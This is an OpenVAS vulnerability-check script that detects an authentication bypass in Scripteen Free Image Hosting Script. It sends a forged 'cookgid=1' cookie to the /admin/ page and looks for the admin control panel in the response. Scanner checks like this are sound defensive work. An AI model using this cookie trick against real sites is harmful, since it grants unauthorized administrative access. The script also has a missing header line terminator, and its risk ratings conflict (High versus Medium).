###############################################################################
# OpenVAS Vulnerability Test
# $Id: scripteen_multiple.nasl 8288 2010-07-05 10:48:02Z mime $
#
# Scripteen Free Image Hosting Script Multiple Vulnerabilities
#
# Authors:
# Michael Meyer
#
# Copyright:
# Copyright (c) 2009 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if (description)
{
 script_id(100246);
 script_tag(name:"cvss_base", value:"7.5");
 script_cve_id("CVE-2009-2892");
 script_bugtraq_id(35800,35801);
 script_version ("1.0");
 script_tag(name:"risk_factor", value:"High");

 script_name("Scripteen Free Image Hosting Script Multiple Vulnerabilities");

desc = "

Overview:
Scripteen Free Image Hosting Script is prone to multiple SQL-injection
vulnerabilities and to an authentication-bypass vulnerability.

Exploiting these issues could allow an attacker to compromise the
application, access or modify data, exploit latent vulnerabilities
in the underlying database or to gain administrative access.

Scripteen Free Image Hosting Script 2.3 is vulnerable; other versions
may also be affected.


References:
http://www.securityfocus.com/bid/35800
http://www.securityfocus.com/bid/35801
http://www.scripteen.com/scripts/scripteen-free-image-hosting-script.html#more-10


Risk factor : Medium";

 script_description(desc);
 script_summary("Determine if Scripteen Free Image Hosting Script is prone to multiple Vulnerabilities");
 script_category(ACT_GATHER_INFO);
 script_family("Web application abuses");
 script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
 script_dependencies("find_service.nes", "http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
   
port = get_http_port(default:80);

if(!get_port_state(port))exit(0);
if(!can_host_php(port:port))exit(0);

dirs = make_list(cgi_dirs());

foreach dir (dirs) {
   
  url = string(dir, "/login.php"); 
  buf = http_get_cache(item:url, port:port);

  if(egrep(pattern: "Scripteen Free Image Hosting Script", string: buf, icase: TRUE)) {

    req = string("GET ", dir, "/admin/ HTTP/1.1\r\n",
              "Host: ", get_host_name(), ":", port, "\r\n",
              "User-Agent: Mozilla/5.0 (OpenVAS; U; Linux i686; en-US; rv:1.7) Gecko/20040712",
              "Accept-Language: en-us,en,de;\r\n",
              "Cookie: cookgid=1\r\n",
              "Connection: close\r\n\r\n");

    buf = http_keepalive_send_recv(port:port, data:req, bodyonly:0);

    if(egrep(pattern:"Admin Control Panel", string:buf) &&
       egrep(pattern:"Total Members", string:buf)       &&
       egrep(pattern:"Total images", string:buf)) {   
 
         security_warning(port:port);
         exit(0);
    }
  }
}

exit(0);

